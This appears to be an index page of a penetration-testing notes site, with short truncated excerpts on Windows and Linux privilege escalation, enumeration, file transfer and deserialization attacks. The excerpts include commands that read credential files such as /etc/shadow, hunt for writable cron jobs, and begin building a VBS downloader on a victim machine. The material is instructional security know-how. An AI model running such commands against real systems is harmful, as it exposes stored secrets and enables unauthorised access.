Shuciran Pentesting Notes

For Privilege Access (Windows)

First, on Windows systems, we should check the status of the AlwaysInstallElevated registry setting. If this key is enabled (set to 1) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user ...

Applications

Enumerating Installed Applications and Patch Levels wmic product get name, version, vendor List system-wide updates with Win32_QuickFixEngineering (qfe) wmic qfe get Caption, Description, HotFixI...

System (Linux)

Distribution ls /etc/*-release cat /etc/os-release cat /etc/issue uname -a cat /proc/version Interesting files cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts ls -lh /var/mail/ ls -...

Jobs and Tasks

List Cron Jobs cat /etc/crontab && ls -al /etc/cron* Find World-Writable Cron jobs find /etc/cron* -type f -perm -o+w -exec ls -l {} \; Find Cron Jobs Owned by Other Users find /etc/cro...

FTP (tcp-21)

Upload To upload a file you need to go to the folder where the file is and ONLY use the file name otherwise you’ll receive a 500 error: passive # must be off binary # to upload binaries, execute th...

Insecure File Permissions (Linux)

Writable and executable file In order to leverage insecure file permissions, we must locate an executable file that not only allows us write access but also runs at an elevated privilege level. Use...

VBS Download

From the victim machine command shell use this list of commands: echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQ...

Uploading files using TFTP (older Windows Systems)

During a penetration test, we can use TFTP to transfer files from older Windows operating systems up to Windows XP and 2003. This is a terrific tool for non-interactive file transfer, but it is not...

Downloads with exe2hex and Powershell

This technique is useful to compress the binary we want to transfer, convert it to a hex string, and embed it into a Windows script. On the Windows machine, we will paste this script into our shel...

Deserialization Attack

Ysoserial.NET ysoserial.NET only works on Windows. After downloading it, we need to identify the format of the binary or program running the code (-g) and the format (-f) that has the deseri...